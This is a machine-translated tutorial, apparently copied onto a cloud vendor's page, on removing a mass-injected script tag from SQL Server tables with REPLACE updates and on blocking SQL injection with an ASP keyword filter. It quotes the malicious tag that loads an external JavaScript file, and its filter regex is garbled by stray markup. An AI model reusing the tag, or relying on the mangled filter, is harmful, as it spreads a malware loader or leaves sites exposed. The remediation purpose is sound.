Code for bulk replacement of database Trojan fields and prevention of SQL injection attacks

Source: Internet
Author: User

Back up the database first to avoid unnecessary losses. Then, execute the varchar field with less than 8000 characters of all mounted horses.
Copy codeThe Code is as follows:
Update table name set field = replace (field name, '<Script Src = http://c.n % 75clear3.com/css/c.js> </Script> ','')

<Script Src = http://c.n % 75clear3.com/css/c.js> </Script> is the trojan field. The trojan field is cleared after execution. However, some fields, such as content fields and other varchar fields with more than 8000 characters, must be executed.
Copy codeThe Code is as follows:
Update table name set table item = replace (cast (Table item as varchar (8000), '<Script Src = http:/c.nuclear3.com/css/c.js> </Script> ','')

To update the trojan field. Due to the large amount of content, the real estate network will be suspended when executing the preceding statement. Therefore, a interval is added and 15000 entries are processed at a time.
Copy codeThe Code is as follows:
Update table name set table item = replace (cast (Table item as varchar (8000), '<Script Src = http:/c.nuclear3.com/css/c.js> </Script> ','') where id> 1 and id <15000

The above Trojan problems are generally SQL databases, which are unique to SQL databases. Changing the database is unrealistic and can only be prevented based on the above situations. The idea is to filter all database connection requests accordingly.
Copy codeThe Code is as follows:
<%
Response. Buffer = true' cache page
'Prevent get Injection
If Request. QueryString <> "Then StopInjection (Request. QueryString)
'Prevents post injection
If Request. Form <> "" Then StopInjection (Request. Form)
'Prevent cookie Injection
If Request. Cookies <> "" Then StopInjection (Request. Cookies)
'Regularized subfunctions
Function StopInjection (Values)
Dim regEx
Set regEx = New RegExp
RegEx. IgnoreCase = True
RegEx. Global = True
RegEx. pattern = "'|; | # | ([\ s \ B + ()] + ([email = select % 7 Cupdate % 7 Cinsert % 7 Cdelete % 7 Cdeclare % 7C @ % 7 Cexec % 7 Cdbcc % 7 Calter % 7 Cdrop % 7 Ccreate % 7 Cbackup % 7Cif % 7 Celse % 7 Cend % 7 Cand % 7Cor % 7 Cadd % 7 Cset % 7 Copen % 7 Cclose % 7 Cuse % 7 Cbegin % 7 Cretun % 7Cas % 7Cgo % 7 Cexists) [/s/B] select | update | insert | delete | declare | @ | exec | dbcc | alter | drop | create | backup | if | else | end | and | or | add | set | open | close | use | begin | retun | as | go | exists) [\ s \ B [/email] +] *)"
Dim sItem, sValue
For Each sItem In Values
SValue = Values (sItem)
If regEx. Test (sValue) Then
Response. Write "<Script Language = javascript> alert ('invalid injection! Your behavior has been recorded !! '); History. back (-1); </Script>"
Response. End
End If
Next
Set regEx = Nothing
End function
%>

Make a general SQL anti-injection page and include it in the conn. asp database connection statement. This enables the whole site to prevent SQL injection attacks. But is the front-end similar? The injection vulnerability still exists in such a statement. We need to strictly filter the content obtained by request. form and request. querystring. You do not need to use the request ("name") method to obtain values. Do not use SQL statements to query database operations for cookies.

If you are not familiar with sqlserver, you can use the software to implement it.
SQL Server database batch replacement tool (database and text file search and replacement) v1.0 Chinese Green Edition

SQL Server database bulk search replacement tool 1.2 SQL Trojan clearing Assistant

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.